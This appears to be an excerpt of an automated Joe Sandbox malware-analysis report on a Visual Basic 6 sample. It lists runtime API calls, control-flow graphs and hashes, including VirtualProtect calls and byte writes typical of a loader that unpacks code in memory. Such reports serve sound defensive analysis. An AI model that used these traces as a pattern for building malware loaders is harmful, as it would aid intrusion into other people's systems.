                                                                    • #644.MSVBVM60(0000E0FF,0057F2D0,0040A1EC,E02474FF,0057F2D0,0040A1F0,20C4832C,0057F2D0,0040A1F4,408B008B,0057F2D0,0040A1F8,0424448B,00000000,00000000,-0000000C), ref: 0054B6B1
                                                                    • VirtualProtect.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000008,00000040,00000000,0057F2D0,0040A1E8,0000E0FF,0057F2D0,0040A1EC,E02474FF), ref: 0054B71D
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,0057F2D0,0040A2BC,00000020), ref: 0054B745
                                                                    • __vbaAryLock.MSVBVM60(0040A208,00000000), ref: 0054B7A0
                                                                    • #644.MSVBVM60(0000000C,0040A208,00000000), ref: 0054B7B8
                                                                    • __vbaAryUnlock.MSVBVM60(0040A208,0000000C,0040A208,00000000), ref: 0054B7C7
                                                                    • #644.MSVBVM60(0057F2CC,00000000), ref: 0054B7ED
                                                                    • #644.MSVBVM60(0000E0FF,0040A1FC,0057F2CC,00000000), ref: 0054B80C
                                                                    • #644.MSVBVM60(00000000,00000000,0000E0FF,0040A1FC,0057F2CC,00000000), ref: 0054B82C
                                                                    • __vbaFreeVar.MSVBVM60(00000000,-00000004,00000000,00000000,00000000,0000E0FF,0040A1FC,0057F2CC,00000000), ref: 0054B84C
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054B8D7,00000000,-00000004,00000000,00000000,00000000,0000E0FF,0040A1FC,0057F2CC,00000000), ref: 0054B8D1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644$Move$Free$List$LockUnlock$Chkstk$Addref$AddressAnsiCheckHandleHresultModuleProcProtectRedimVirtual$#632#653CastDestruct
                                                                    • String ID: @$DqlqlqFquqnqcqtqiqoqnqCqaqlqlq$bvm
                                                                    • API String ID: 4157516495-683613472
                                                                    • Opcode ID: 92aa114b58db18d5145934bd0a1cab13d4fe2211b4014a62d4f8a863d13a2b91
                                                                    • Instruction ID: 2f1f8c6d587148cfc0f55deb6c67f51440d76f509c759478130c6098f3c3dfbd
                                                                    • Opcode Fuzzy Hash: 92aa114b58db18d5145934bd0a1cab13d4fe2211b4014a62d4f8a863d13a2b91
                                                                    • Instruction Fuzzy Hash: 70423171D40209AFDB04EBA5CC46FDE77B9BF08304F10416AF605FB1A2DA399A449F65

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 66 54c6e3-54c747 __vbaChkstk __vbaObjSetAddref 68 54c763 66->68 69 54c749-54c761 __vbaHresultCheckObj 66->69 70 54c76a-54c776 68->70 69->70 71 54c77d-54c843 __vbaObjSetAddref call 54e57d __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaFreeVar __vbaObjSetAddref call 54e57d __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaFreeVar 70->71 72 54c778 70->72 80 54c845-54c85d __vbaHresultCheckObj 71->80 81 54c85f 71->81 73 54d30a-54d374 __vbaAryUnlock __vbaAryDestruct __vbaFreeObj * 2 __vbaAryDestruct __vbaFreeObj 72->73 82 54c866-54c88a 80->82 81->82 84 54c8a6 82->84 85 54c88c-54c8a4 __vbaHresultCheckObj 82->85 86 54c8ad-54c8d1 84->86 85->86 88 54c8d3-54c8eb __vbaHresultCheckObj 86->88 89 54c8ed 86->89 90 54c8f4-54c9cc __vbaObjSetAddref call 54e3be __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaObjSetAddref call 54e3be __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj __vbaObjSetAddref call 54e3be __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeObj 88->90 89->90 98 54c9ce-54c9e6 __vbaHresultCheckObj 90->98 99 54c9e8 90->99 100 54c9ef-54ca13 98->100 99->100 102 54ca15-54ca2d __vbaHresultCheckObj 100->102 103 54ca2f 100->103 104 54ca36-54ca5a 102->104 103->104 106 54ca76 104->106 107 54ca5c-54ca74 __vbaHresultCheckObj 104->107 108 54ca7d-54ca9b 106->108 107->108 110 54cab7 108->110 111 54ca9d-54cab5 __vbaHresultCheckObj 108->111 112 54cabe-54cb14 __vbaRedim __vbaAryLock 110->112 111->112 114 54cb16-54cb2e __vbaHresultCheckObj 112->114 115 54cb30 112->115 116 54cb37-54cb4e __vbaAryUnlock 114->116 115->116 117 54cb50-54cb6d call 54d6db 116->117 118 54cb7e-54cb8c 116->118 122 54cb72-54cb77 117->122 120 54cba3-54cbc1 118->120 121 54cb8e-54cb92 call 54d40c 118->121 127 54cbc3-54cbdb __vbaHresultCheckObj 120->127 128 54cbdd 120->128 125 54cb97-54cb9c 121->125 122->118 124 54cb79 122->124 124->73 125->120 129 54cb9e 125->129 130 54cbe4-54cbe8 127->130 128->130 129->73 131 54cbee-54cbf5 130->131 132 54cd3b-54cda0 __vbaAryLock #644 __vbaAryUnlock call 54ac41 call 57d330 __vbaObjSet 130->132 131->132 133 54cbfb-54cc51 __vbaRedim __vbaAryLock 131->133 142 54cdc5-54cdfa 132->142 143 54cda2-54cdc2 __vbaRedim 132->143 138 54cc53-54cc6b __vbaHresultCheckObj 133->138 139 54cc6d 133->139 141 54cc74-54cc8b __vbaAryUnlock 138->141 139->141 144 54cc8d-54ccb4 call 54d6db 141->144 145 54ccbb-54ccc9 141->145 147 54ce00-54ce31 __vbaAryLock 142->147 148 54d2fe-54d305 142->148 143->142 144->145 159 54ccb6 144->159 150 54cce0-54cd36 __vbaAryLock #644 __vbaAryUnlock call 54ac41 call 57d330 __vbaObjSet 145->150 151 54cccb-54ccd9 call 54d40c 145->151 153 54ce37-54ce55 147->153 154 54d1f8-54d21c 147->154 148->73 150->132 151->150 160 54ccdb 151->160 164 54ce57-54ce6f __vbaHresultCheckObj 153->164 165 54ce71 153->165 167 54d21e-54d236 __vbaHresultCheckObj 154->167 168 54d238 154->168 159->73 160->73 170 54ce78-54cf0f __vbaVarDup #607 __vbaStrVarMove __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVarList #644 164->170 165->170 169 54d23f-54d249 167->169 168->169 171 54d24f-54d2bd __vbaRedim __vbaAryLock 169->171 172 54d2e9-54d2f4 __vbaAryUnlock 169->172 175 54cf11-54cf29 __vbaHresultCheckObj 170->175 176 54cf2b 170->176 177 54d2bf-54d2d7 __vbaHresultCheckObj 171->177 178 54d2d9 171->178 172->148 179 54cf32-54cf50 175->179 176->179 180 54d2e0-54d2e4 __vbaAryUnlock 177->180 178->180 182 54cf52-54cf6a __vbaHresultCheckObj 179->182 183 54cf6c 179->183 180->172 184 54cf73-54cff7 __vbaVarDup #606 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar #644 182->184 183->184 186 54d013 184->186 187 54cff9-54d011 __vbaHresultCheckObj 184->187 188 54d01a-54d038 186->188 187->188 190 54d054 188->190 191 54d03a-54d052 __vbaHresultCheckObj 188->191 192 54d05b-54d0df __vbaVarDup #606 __vbaStrMove __vbaStrCopy __vbaFreeStr __vbaFreeVar #644 190->192 191->192 194 54d0e1-54d0f9 __vbaHresultCheckObj 192->194 195 54d0fb 192->195 196 54d102-54d126 194->196 195->196 198 54d142 196->198 199 54d128-54d140 __vbaHresultCheckObj 196->199 200 54d149-54d153 198->200 199->200 201 54d1f3 200->201 202 54d159-54d1c7 __vbaRedim __vbaAryLock 200->202 201->172 204 54d1e3 202->204 205 54d1c9-54d1e1 __vbaHresultCheckObj 202->205 206 54d1ea-54d1ee __vbaAryUnlock 204->206 205->206 206->201
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054C700
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401006), ref: 0054C719
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054C756
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0054C784
                                                                      • Part of subcall function 0054E57D: __vbaChkstk.MSVBVM60(?,00401006), ref: 0054E599
                                                                      • Part of subcall function 0054E57D: __vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401006), ref: 0054E5B2
                                                                      • Part of subcall function 0054E57D: __vbaVarMove.MSVBVM60 ref: 0054E5D1
                                                                      • Part of subcall function 0054E57D: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054E603
                                                                      • Part of subcall function 0054E57D: __vbaVarCmpGt.MSVBVM60(?,0057F2C0,00008003,0000000B), ref: 0054E64F
                                                                      • Part of subcall function 0054E57D: __vbaVarOr.MSVBVM60(?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E659
                                                                      • Part of subcall function 0054E57D: __vbaBoolVarNull.MSVBVM60(00000000,?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E65F
                                                                      • Part of subcall function 0054E57D: __vbaFreeVar.MSVBVM60(00000000,?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E66B
                                                                      • Part of subcall function 0054E57D: __vbaFreeObj.MSVBVM60(0054E767,?,00006011,?), ref: 0054E761
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000000,?,?), ref: 0054C797
                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000,?,?), ref: 0054C7A1
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00000000,?,?), ref: 0054C7B1
                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,?,?), ref: 0054C7B9
                                                                    • __vbaFreeObj.MSVBVM60(?,?,00000000,?,?), ref: 0054C7C1
                                                                    • __vbaFreeVar.MSVBVM60(?,?,00000000,?,?), ref: 0054C7C9
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,?,?,00000000,?,?), ref: 0054C7D5
                                                                      • Part of subcall function 0054E57D: __vbaRedim.MSVBVM60(00000080,00000001,0057F220,00000011,00000001,-00000001,00000000,00000000,?,00000000,?,0057F2C0,00008003,0000000B), ref: 0054E694
                                                                      • Part of subcall function 0054E57D: __vbaAryLock.MSVBVM60(?), ref: 0054E6A6
                                                                      • Part of subcall function 0054E57D: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054E6E6
                                                                      • Part of subcall function 0054E57D: __vbaAryUnlock.MSVBVM60(?), ref: 0054E6FE
                                                                      • Part of subcall function 0054E57D: __vbaVarMove.MSVBVM60(?,00006011,?), ref: 0054E724
                                                                    • __vbaStrVarMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054C7E8
                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054C7F2
                                                                    • __vbaStrCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054C802
                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054C80A
                                                                    • __vbaFreeObj.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054C812
                                                                    • __vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,00000000,?,?), ref: 0054C81A
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054C852
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054C899
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054C8E0
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0054C8FB
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?), ref: 0054C90B
                                                                    • __vbaStrCopy.MSVBVM60(00000000,?,?), ref: 0054C91B
                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,?), ref: 0054C923
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?), ref: 0054C92B
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?), ref: 0054C937
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054C947
                                                                    • __vbaStrCopy.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054C957
                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054C95F
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?,00000000,?,?), ref: 0054C967
                                                                    • __vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?,00000000,?,?), ref: 0054C973
                                                                    • __vbaStrMove.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054C983
                                                                    • __vbaStrCopy.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054C993
                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054C99B
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?,00000000,?,?,00000000,?,?), ref: 0054C9A3
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054C9DB
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054CA22
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054CA69
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054CAAA
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 0054CAD4
                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0054CAE3
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054CB23
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054CBD0
                                                                    • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,0FFFFFFF,00000000), ref: 0054CC11
                                                                    • __vbaAryLock.MSVBVM60(?,?), ref: 0054CC20
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A6F4,0000000C), ref: 0054CC60
                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0054CC78
                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0054CB3B
                                                                      • Part of subcall function 0054D6DB: __vbaChkstk.MSVBVM60(?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D6F6
                                                                      • Part of subcall function 0054D6DB: __vbaVarVargNofree.MSVBVM60(?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D70E
                                                                      • Part of subcall function 0054D6DB: __vbaStrVarCopy.MSVBVM60(00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D714
                                                                      • Part of subcall function 0054D6DB: __vbaStrMove.MSVBVM60(00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D71E
                                                                      • Part of subcall function 0054D6DB: __vbaNew2.MSVBVM60(00407D80,00000000,00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF,?), ref: 0054D751
                                                                      • Part of subcall function 0054D6DB: __vbaHresultCheckObj.MSVBVM60(00000000,?,0040A318,0000001C,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF), ref: 0054D793
                                                                      • Part of subcall function 0054D6DB: __vbaStrToAnsi.MSVBVM60(?,00004008,00000018,00000000,?,?,?,?,00401006,?,?,?,0054CCAF,?,00004008,000000FF), ref: 0054D7AC
                                                                      • Part of subcall function 0054D6DB: __vbaSetSystemError.MSVBVM60(?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401006,?,?,?,0054CCAF), ref: 0054D7C0
                                                                      • Part of subcall function 0054D6DB: __vbaFreeStrList.MSVBVM60(00000002,00004008,?,?,00000000,00000000,?,00004008,00000018,00000000,?,?,?,?,00401006), ref: 0054D7DE
                                                                      • Part of subcall function 0054D6DB: __vbaNew2.MSVBVM60(00407D80,00000000), ref: 0054D801
                                                                    • __vbaAryUnlock.MSVBVM60(?,0054D375,?,00000000,?,?,?,?,?,?,?), ref: 0054D341
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,?,0054D375,?,00000000,?,?,?,?,?,?,?), ref: 0054D34C
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?,0054D375,?,00000000,?,?,?,?,?,?,?), ref: 0054D354
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,?,0054D375,?,00000000,?,?,?,?,?,?,?), ref: 0054D35C
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,00000000,?,?,0054D375,?,00000000,?,?,?,?,?,?,?), ref: 0054D367
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,00000000,?,?,0054D375,?,00000000,?,?,?,?,?,?,?), ref: 0054D36F
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Free$CheckHresult$Move$Addref$Copy$Unlock$ChkstkLockRedim$DestructNew2$AnsiBoolErrorListNofreeNullSystemVarg
                                                                    • String ID:
                                                                    • API String ID: 734032644-0
                                                                    • Opcode ID: 40186bcbe77b824b9ac69038f50abfa0925ebe3356a1c456c2a2d8ab25a56edb
                                                                    • Instruction ID: da34fe79ffe0922f3e2226472eab5ba6b4a307db05ca8844860cdd66e083533b
                                                                    • Opcode Fuzzy Hash: 40186bcbe77b824b9ac69038f50abfa0925ebe3356a1c456c2a2d8ab25a56edb
                                                                    • Instruction Fuzzy Hash: B892D271D00219AFDF14EBA5DC45FEDBBB9BF08304F10846AE215BB1A2DB7999448F14

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(00000000,00401006,?,?,?,0054BAB4,?,?,?), ref: 0054E7A0
                                                                    • __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,?,00000003,?,00000000,00401006,?,?,?,0054BAB4), ref: 0054E7C5
                                                                    • __vbaNew.MSVBVM60(0040A2AC,0040A2BC), ref: 0054E7D7
                                                                    • __vbaObjSet.MSVBVM60(?,00000000,0040A2AC,0040A2BC), ref: 0054E7E1
                                                                    • __vbaCastObj.MSVBVM60(00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E7E7
                                                                    • __vbaObjSet.MSVBVM60(0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E7F1
                                                                    • __vbaFreeObj.MSVBVM60(0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E7F9
                                                                    • __vbaObjSetAddref.MSVBVM60(00000000,0040A2AC,0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E805
                                                                    • #644.MSVBVM60(00000000,00000000,0040A2AC,0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E80B
                                                                    • __vbaFreeObj.MSVBVM60(00000000,00000000,0040A2AC,0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E816
                                                                    • #644.MSVBVM60(0040A2BC,00000000,00000000,0040A2AC,0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E81F
                                                                    • #644.MSVBVM60(?,0040A2BC,00000000,00000000,0040A2AC,0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E82B
                                                                    • #644.MSVBVM60(0040A2BC,?,0040A2BC,00000000,00000000,0040A2AC,0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E837
                                                                    • #644.MSVBVM60(0040A2BC,0040A2BC,?,0040A2BC,00000000,00000000,0040A2AC,0040A2AC,00000000,00000000,?,00000000,0040A2AC,0040A2BC), ref: 0054E843
                                                                    • __vbaAryLock.MSVBVM60(?,?,?), ref: 0054E887
                                                                    • #644.MSVBVM60(?,?,?,?), ref: 0054E89F
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,?), ref: 0054E8AB
                                                                    • __vbaObjSetAddref.MSVBVM60(00000000,0040A2AC,?), ref: 0054E8CB
                                                                    • #644.MSVBVM60(00000000,00000000,0040A2AC,?), ref: 0054E8D1
                                                                    • __vbaFreeObj.MSVBVM60(00000000,00000000,0040A2AC,?), ref: 0054E8DC
                                                                    • #644.MSVBVM60(?,00000000,00000000,0040A2AC,?), ref: 0054E8E5
                                                                    • __vbaAryLock.MSVBVM60(?,?,0040A2BC,00000000,?,00000000,00000000,0040A2AC,?), ref: 0054E8FA
                                                                    • #644.MSVBVM60(?,?,?,0040A2BC,00000000,?,00000000,00000000,0040A2AC,?), ref: 0054E911
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,?,0040A2BC,00000000,?,00000000,00000000,0040A2AC,?), ref: 0054E91D
                                                                    • #644.MSVBVM60(0040A2BC,?,?,?,?,0040A2BC,00000000,?,00000000,00000000,0040A2AC,?), ref: 0054E92C
                                                                    • #644.MSVBVM60(0057F2B0,0040A2BC,0040A2BC,0040A2BC,?,?,?,?,0040A2BC,00000000,?,00000000,00000000,0040A2AC,?), ref: 0054E965
                                                                    • #644.MSVBVM60(00000040,-0000000C,00000000,0057F2B0,0040A2BC,0040A2BC,0040A2BC,?,?,?,?,0040A2BC,00000000,?,00000000,00000000), ref: 0054E988
                                                                    • __vbaAryLock.MSVBVM60(?,0040A2BC,-0000000C,00000040,-0000000C,00000000,0057F2B0,0040A2BC,0040A2BC,0040A2BC,?,?,?,?,0040A2BC,00000000), ref: 0054E9B3
                                                                    • __vbaStrCat.MSVBVM60(0040A2E4,0040A2DC,?,00000000,?,0040A2BC,-0000000C,00000040,-0000000C,00000000,0057F2B0,0040A2BC,0040A2BC,0040A2BC,?,?), ref: 0054E9D8
                                                                    • __vbaStrMove.MSVBVM60(0040A2E4,0040A2DC,?,00000000,?,0040A2BC,-0000000C,00000040,-0000000C,00000000,0057F2B0,0040A2BC,0040A2BC,0040A2BC,?,?), ref: 0054E9E2
                                                                    • __vbaI4Str.MSVBVM60(00000000,0040A2E4,0040A2DC,?,00000000,?,0040A2BC,-0000000C,00000040,-0000000C,00000000,0057F2B0,0040A2BC,0040A2BC,0040A2BC,?), ref: 0054E9E8
                                                                    • VirtualProtect.KERNELBASE(0040A2AC,00000000,00000000,0040A2E4,0040A2DC,?,00000000,?,0040A2BC,-0000000C,00000040,-0000000C,00000000,0057F2B0,0040A2BC,0040A2BC), ref: 0054E9F6
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,0040A2AC,0040A2BC,0000002C), ref: 0054EA11
                                                                    • __vbaAryUnlock.MSVBVM60(?), ref: 0054EA23
                                                                    • __vbaFreeStr.MSVBVM60(?), ref: 0054EA2B
                                                                    • #644.MSVBVM60(0057F2B0,?), ref: 0054EA39
                                                                    • __vbaStrCat.MSVBVM60(0040AA60,0040AA58,0057F2B0,?), ref: 0054EA4B
                                                                    • __vbaStrMove.MSVBVM60(0040AA60,0040AA58,0057F2B0,?), ref: 0054EA55
                                                                    • __vbaStrCat.MSVBVM60(0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EA60
                                                                    • #638.MSVBVM60(00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EA7D
                                                                    • __vbaFreeStr.MSVBVM60(00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EA90
                                                                    • __vbaFreeVar.MSVBVM60(00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EA98
                                                                    • __vbaAryLock.MSVBVM60(?,00000000,00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EAD8
                                                                    • #644.MSVBVM60(?,?,00000000,00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EAF0
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,00000000,00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EAFC
                                                                    • #644.MSVBVM60(0C2474FF,00000000,00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EB21
                                                                    • #644.MSVBVM60(0C2454FF,0040A2BC,0040A2B8,0C2474FF,00000000,00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0,?), ref: 0054EB43
                                                                    • #644.MSVBVM60(10244C8B,0040A2BC,0040A2B4,0C2454FF,0040A2BC,0040A2B8,0C2474FF,00000000,00000000,00000000,00000008,0040AC74,00000000,0040AA60,0040AA58,0057F2B0), ref: 0054EB65
                                                                    • #644.MSVBVM60(2CC20189,0040A2BC,0040A2B0,10244C8B,0040A2BC,0040A2B4,0C2454FF,0040A2BC,0040A2B8,0C2474FF,00000000,00000000,00000000,00000008,0040AC74,00000000), ref: 0054EB87
                                                                    • #644.MSVBVM60(00000000,0040A2BC,0040A2AC,2CC20189,0040A2BC,0040A2B0,10244C8B,0040A2BC,0040A2B4,0C2454FF,0040A2BC,0040A2B8,0C2474FF,00000000,00000000,00000000), ref: 0054EBA6
                                                                    • #644.MSVBVM60(?,0040A2BC,0040A2A8,00000000,0040A2BC,0040A2AC,2CC20189,0040A2BC,0040A2B0,10244C8B,0040A2BC,0040A2B4,0C2454FF,0040A2BC,0040A2B8,0C2474FF), ref: 0054EBD8
                                                                    • #644.MSVBVM60(00000000,?,0040A2BC,0040A2A8,00000000,0040A2BC,0040A2AC,2CC20189,0040A2BC,0040A2B0,10244C8B,0040A2BC,0040A2B4,0C2454FF,0040A2BC,0040A2B8), ref: 0054EBE4
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,0040A2AC,0040A2BC,00000020), ref: 0054EC30
                                                                    • __vbaAryLock.MSVBVM60(?,00000000), ref: 0054EC79
                                                                    • #644.MSVBVM60(?,?,00000000), ref: 0054EC91
                                                                    • __vbaAryUnlock.MSVBVM60(?,?,?,00000000), ref: 0054EC9D
                                                                    • #644.MSVBVM60(?,00000000), ref: 0054ECBB
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054ED0B,00000000,0040A2BC,?,00000000), ref: 0054ECFD
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,0054ED0B,00000000,0040A2BC,?,00000000), ref: 0054ED05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$#644$Free$LockUnlock$AddrefCheckHresultMove$#638CastChkstkDestructProtectRedimVirtual
                                                                    • String ID: @$hW
                                                                    • API String ID: 265859740-140651850
